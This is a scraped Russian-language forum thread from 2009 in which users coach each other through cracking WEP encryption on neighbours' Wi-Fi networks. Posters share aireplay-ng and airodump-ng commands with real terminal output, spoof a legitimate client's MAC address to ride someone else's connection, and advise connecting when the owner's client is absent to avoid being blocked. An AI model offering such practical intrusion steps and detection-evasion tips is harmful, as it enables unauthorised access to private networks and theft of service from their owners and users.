[Wi-Fi, BT] Задай вопрос - получи ответ!

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by Alexsize, 11 Sep 2007.

Thread Status:
Not open for further replies.
  1. Kortez

    Kortez New Member

    Joined:
    10 Jun 2009
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
     
  2. asusm2ne

    asusm2ne Member

    Joined:
    24 Jun 2009
    Messages:
    6
    Likes Received:
    5
    Reputations:
    0
    Добрый день! Уважаемые колдуны, вопросов много, начну с главного (ибо сегодня нужно определится) Вобщем купил точку доступа Planet WAP-4036, но нудобно без хаба, хочу сделать чтоб инет раздавало без взаимодействия компа (сервака)... Вот думаю сменить на Planet WAP-4035 со строеным хабом! Вопрос такой: какую точку лучше взять, интересует дальность радиуса действия и стабильность работы! Или порекомендуйте других производителей: только D-link, TP-link или из Planet что то иное! Другие фирмы не предлагать, ибо у нас их почти нет и цена кусючая! Заранее спс
     
  3. igor29

    igor29 New Member

    Joined:
    22 Jun 2009
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    boykent
    спасибо за совет сменил mac и ip но ниче не изменилось
     
  4. boykent

    boykent New Member

    Joined:
    8 May 2009
    Messages:
    69
    Likes Received:
    3
    Reputations:
    0
    igor29
    а ты не пробовал баловаться последними цифрами ip адреса? Пример:
    192.168._._ , менять последнии цифры!У меня сначало тоже ничего не шло но потом попал,и не получалось подключится когда клиент,хозяин этого мак адреса был подключён!может в этом причина?!
     
  5. boykent

    boykent New Member

    Joined:
    8 May 2009
    Messages:
    69
    Likes Received:
    3
    Reputations:
    0
    Kortez
    Чуть выше описовал взлом Semby68,за что ему спасибо!Попробуй этим способом,там можно заставить точку с помощью aireplay-ng отдавать пакеты твоему мак адресу!
    Да, и там есть строка, её нужно прописать так: aireplay-ng -1 0 -a (BSSID точки) -h (твой BSSID) -e (ESSID точки) твой девайс (у меня он ath0) Короче, вот ссылка там всё увидешь: http://guruadmin.ru/page/vzlamyvaem-wep-ispolzuja-backtrack-3
    А ещё, что я делал чтоб пакеты быстрей собирались но это если есть хотябы один клиент возле точки прописывал вместо своего МАК адреса мак адрес клиента!И скорость сбора увеличивалась раза в два, в три!!!
     
    #2025 boykent, 24 Jun 2009
    Last edited: 24 Jun 2009
  6. igor29

    igor29 New Member

    Joined:
    22 Jun 2009
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    boykent
    Спасибо сработало,оказалось ты был прав тот mac который я подставлял был занят я чуток подождал и попробывал снова, сработало :cool:
     
  7. boykent

    boykent New Member

    Joined:
    8 May 2009
    Messages:
    69
    Likes Received:
    3
    Reputations:
    0
    Предупрежу тебя!Незлоупотребляй подключением или иначе тебя заблочат т.е., клиент которого ты используешь мак адрес в то время пока ты подключён не сможет подключится и тогда поменяет мак адре или того хуже зашифруют сетку!Используй подключение тогда когда клиент отсутствует, а лучше запомни время когда тебе можно подключится!Удачи и всех благ!
     
  8. igor29

    igor29 New Member

    Joined:
    22 Jun 2009
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    boykent
    спасиб за предупреждение уж за этим прослежу :)
     
  9. Kortez

    Kortez New Member

    Joined:
    10 Jun 2009
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    После того, как я прописываю эту команду, выдёт мол процесс unsuccesful.
     
  10. t_serega

    t_serega New Member

    Joined:
    14 May 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Поделитесь возможным успешным опытом установки и запуска Kismet-2009-06-R1 (берется с сайта http://www.kismetwireless.net/download.shtml) в Ubuntu 9.04
    Я запаривался настраивать процессы kismet_server и kismet_client :-(
     
  11. boykent

    boykent New Member

    Joined:
    8 May 2009
    Messages:
    69
    Likes Received:
    3
    Reputations:
    0
    попробуй без ( -е ESSID точки ). Дело в том что я пробовал сначало без него и ничего,а потом прописал ESSID и всё заработало! Ты ж делаешь всё по инструкции?Как описано здесь http://guruadmin.ru/page/vzlamyvaem-wep-ispolzuja-backtrack-3 ?
     
  12. Kortez

    Kortez New Member

    Joined:
    10 Jun 2009
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Слушай ты прав, я в начале ESSID не прописывал, сейчас прописал и кажется пробился, во что было в результате:

    root@bt:~# aireplay-ng -1 0 -a 00:1A:2B:2B:6E:20 -h 00:11:22:33:44:55 -e JAZZTEL_1D wlan0
    06:49:59 Waiting for beacon frame (BSSID: 00:1A:2B:2B:6E:20) on channel 11

    06:49:59 Sending Authentication Request (Open System) [ACK]
    06:49:59 Authentication successful
    06:49:59 Sending Association Request [ACK]
    06:49:59 Association successful :) (AID: 1)
    root@bt:~# aireplay-ng -3 -b 00:1A:2B:2B:6E:20 -h 00:11:22:33:44:55 wlan0
    For information, no action required: Using gettimeofday() instead of /dev/rtc
    06:51:23 Waiting for beacon frame (BSSID: 00:1A:2B:2B:6E:20) on channel 11
    Saving ARP requests in replay_arp-0625-065123.cap
    You should also start airodump-ng to capture replies.
    ^Cad 4153 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)


    Но data покеты всё равно не собираются...хмм
     
  13. boykent

    boykent New Member

    Joined:
    8 May 2009
    Messages:
    69
    Likes Received:
    3
    Reputations:
    0
    Kortez Слушай ты прав, я в начале ESSID не прописывал, сейчас прописал и кажется пробился, во что было в результате:

    root@bt:~# aireplay-ng -1 0 -a 00:1A:2B:2B:6E:20 -h 00:11:22:33:44:55 -e JAZZTEL_1D wlan0


    Попробуй вместо своего ( -h 00:11:22:33:44:55 ) прописать bssid клиента, но это если есть клиент рядом с точкой! или если нет клиента может ты знаешь bssid его?!тогда попробуй прописать если его даже нет! Вообщем побалуйся,мож чё получится, у меня на 100 % вышло!
     
    #2033 boykent, 25 Jun 2009
    Last edited: 25 Jun 2009
  14. Kortez

    Kortez New Member

    Joined:
    10 Jun 2009
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    А как определить, есть ли рядом с ним клиент?и как узнать bssid клиента?
     
  15. boykent

    boykent New Member

    Joined:
    8 May 2009
    Messages:
    69
    Likes Received:
    3
    Reputations:
    0
    опредилить можно только визуально!Когда ты прописываешь команду: airodump-ng -c (channel) -w pacets -bssid (мак адрес точки) (твой девайс), запускается airodump-ng именно для этой точки!То ниже если есть клиент(точнее пользователь зтой точки) ты увидешь типа того:

    FF:FF:FF:FF:FF:FF XX:XX:XX:XX:XX:XX 0 0 0 0

    FF:FF:FF:FF:FF:FF - Это мак адрес точки которую ты хочешь взломать!

    XX:XX:XX:XX:XX:XX - это мак адрес клиента!!!Но это если он есть!
     
  16. Kortez

    Kortez New Member

    Joined:
    10 Jun 2009
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Вот проблема в том, что клиентов нету, молчит по полной. Отсюда и отсутствие дата пакетов, что делать я прям хз... :(
     
  17. boykent

    boykent New Member

    Joined:
    8 May 2009
    Messages:
    69
    Likes Received:
    3
    Reputations:
    0
    Попробуй вот эту атаку aireplay-ng -2 -p 0841 -e <имя_точки>
    Не забыть поставить канал на котором висит точка с помощью iwconfig rausb0 channel <n>, правда я ещё сам не пробовал, сегодня попробую и отпишусь! И ты напиши как получилось!
     
  18. Kortez

    Kortez New Member

    Joined:
    10 Jun 2009
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Вот что выдаёт :

    root@bt:~# iwconfig wlan0 channel 11
    root@bt:~# aireplay-ng -2 -p 0841 -e JAZZTEL_1D
    No replay interface specified.
    "aireplay-ng --help" for help.


    Далее присмотрелся в:

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:1A:2B:2B:6E:20 -77 100 11726 104537 0 11 54 WEP WEP OPN JAZZTEL_1D

    BSSID STATION PWR Rate Lost Packets Probe

    00:1A:2B:2B:6E:20 00:08:A1:81:10:6F 0 18- 0 0 282235

    Увидел STATION и как я понял, это и есть клиент. Далее прописал его в :
    aireplay-ng -1 0 -a 00:1A:2B:2B:6E:20 -h 00:08:A1:81:10:6F -e JAZZTEL_1D wlan0
    и aireplay-ng -3 -b 00:1A:2B:2B:6E:20 -h 00:23:54:5F:66:0F wlan0

    И сработало, собрал 100к пакетов за пару минут.

    Хотелось бы ещё разобраться с атакой aireplay-ng -2 -p 0841 -e
     
  19. boykent

    boykent New Member

    Joined:
    8 May 2009
    Messages:
    69
    Likes Received:
    3
    Reputations:
    0
    Я так думаю нужно прописать было так: aireplay-ng -2 -p 0841 -e (ESSID точки) (твой девайс) !
    Попробовал у себя если честно чёт ничего не понял, буду разбиратся дальше! Вот тут видео по этой атаке: http://www.casttv.com/video/ymwdo71/avhackers-cracking-wep-with-aireplay-ng-0841-method-video , и тут http://www.genwi.com/play/1759426
     
    #2039 boykent, 26 Jun 2009
    Last edited: 26 Jun 2009
  20. Kortez

    Kortez New Member

    Joined:
    10 Jun 2009
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Не получается у меня разобраться с этой атакой...как у тебя успехи?
     
Thread Status:
Not open for further replies.